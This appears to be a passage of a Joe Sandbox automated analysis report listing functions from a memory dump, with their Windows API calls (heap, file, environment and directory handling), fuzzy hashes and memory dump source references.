                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: RaiseFailFastException$kernelbase.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1646373207-919018592
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f971f7f1864754798e9c7dca3868d56d6cf29aa9825d7e6e2a119dfb5e6b01ee
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BDF01D21A1869A92F744AB12F444069EA60EF89B90BD49136D94F03724CF7CD5458710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1511130 Relevance: 6.2, APIs: 4, Instructions: 156COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$CurrentDirectorytowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1403193329-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8f12ec0cfcd936a987ebeb0b3721ecca5b9c81898bdfe4a19f372ac06b3fdf31
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 845776a651dec02c376f4910fe7b9387625107c2acd8819f381227055d80d9a2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f12ec0cfcd936a987ebeb0b3721ecca5b9c81898bdfe4a19f372ac06b3fdf31
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D61BF32A08B868AF760EB25D4402EDB7A1FB44758FD44176DE5E43AA9DFBCD480C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1524878 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsnicmp$wcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3270668897-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 7bfb1f83745d1f30d4398a7b43d5157a6fa3d03bbb31ce675dc95920c6bb3d6b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16518C52E4864B81FB61BF1594101BDA3A1EF46B80FD88076CA0F872F6DFACE9518360
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153F358 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$DriveFullNamePathType
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3442494845-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: c4faa7a40be53a6a0e94dcc52435e0141cda1ae593caa646d4c93336f675662c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: b70335a2b11e64af7de1770be68b3242b5247d619088922f57468ba6942184ee
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c4faa7a40be53a6a0e94dcc52435e0141cda1ae593caa646d4c93336f675662c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9318D32605B8A8AEB60DF11E8407EDB3A4FB89B84F844136EA4E47B64DF7CD645C710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1528F80 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 140117192-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f89c23c089f0c488287e70dc6f6f589f12c3b95541b062be37fe73687e9b86f7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F419735608B4AC5FB50AB14F890369B3A4FB98794FE04136EA8E42774DFBDE544C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1528470 Relevance: 6.1, APIs: 4, Instructions: 72stringCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcstol$lstrcmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3515581199-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 1ec1ab86d507ea5c7952e61f5250503bcced2f97ca23c652ede17bf3e6fe139b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E219333B0864783F7606BA9A09413DEAE0FF59784FD551BADB4F82678CFACE4458610
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1514F58 Relevance: 6.1, APIs: 4, Instructions: 72filetimeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: File_get_osfhandle$TimeWrite
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4019809305-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 09dabe170caeebea7f860f5de6e16b31c34f582c7189c6cf3a160bddb4044747
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E431A122A08B4B87F7906B14944433CF690AF49BA1FD4523AD91F43BB5CFFCD4958620
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1541914 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$DriveNamePathTypeVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1029679093-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 98c11749b4d10f39a46d47e0adf4f6b8e1502341a23e0233d90f7bb3d593d270
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5e459355e34db9e4bf3b692a120ae922dabe222efc115a6609885e182a03a74c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 98c11749b4d10f39a46d47e0adf4f6b8e1502341a23e0233d90f7bb3d593d270
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6314B32705B8A8AFB609F21D8943ECA7A0FB49B84F944176CA4E47B54DF7CE645C710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153E810 Relevance: 6.1, APIs: 4, Instructions: 67fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2448200120-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: db3f9ec087eb230555f872d635dc03bfa0ba0b02cbc2f58377a204ab7014c48d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89214B31E1864B86F7547B11A41027DFAA1FB84B91FD54136E91F43BA5CFBCE4518A20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1527CF8 Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 59c146f898a345dfa371a4d4448ad20d1182587ec0b104086d2090afe53f4c1b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F217162708B4B86FB04EB51A50007DF7A1EB89BD0BD49275CA5F43775DE7CE0058620
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1516A48 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7D1523D0C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523C24: towupper.MSVCRT ref: 00007FF7D1523D2F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523C24: iswalpha.MSVCRT ref: 00007FF7D1523D4F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523C24: towupper.MSVCRT ref: 00007FF7D1523D75
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D1523DBF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D153EA0F,?,?,?,00007FF7D153E925,?,?,?,?,00007FF7D151B9B1), ref: 00007FF7D1516ABF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D1516AD3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1516B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF7D1516AE8,?,?,?,00007FF7D153EA0F,?,?,?,00007FF7D153E925), ref: 00007FF7D1516B8B
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1516B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF7D1516AE8,?,?,?,00007FF7D153EA0F,?,?,?,00007FF7D153E925), ref: 00007FF7D1516B97
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1516B84: RtlFreeHeap.NTDLL ref: 00007FF7D1516BAF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1516B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1516AF1,?,?,?,00007FF7D153EA0F,?,?,?,00007FF7D153E925), ref: 00007FF7D1516B39
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1516B30: RtlFreeHeap.NTDLL ref: 00007FF7D1516B4D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1516B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1516AF1,?,?,?,00007FF7D153EA0F,?,?,?,00007FF7D153E925), ref: 00007FF7D1516B59
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D153EA0F,?,?,?,00007FF7D153E925,?,?,?,?,00007FF7D151B9B1), ref: 00007FF7D1516B03
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D1516B17
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
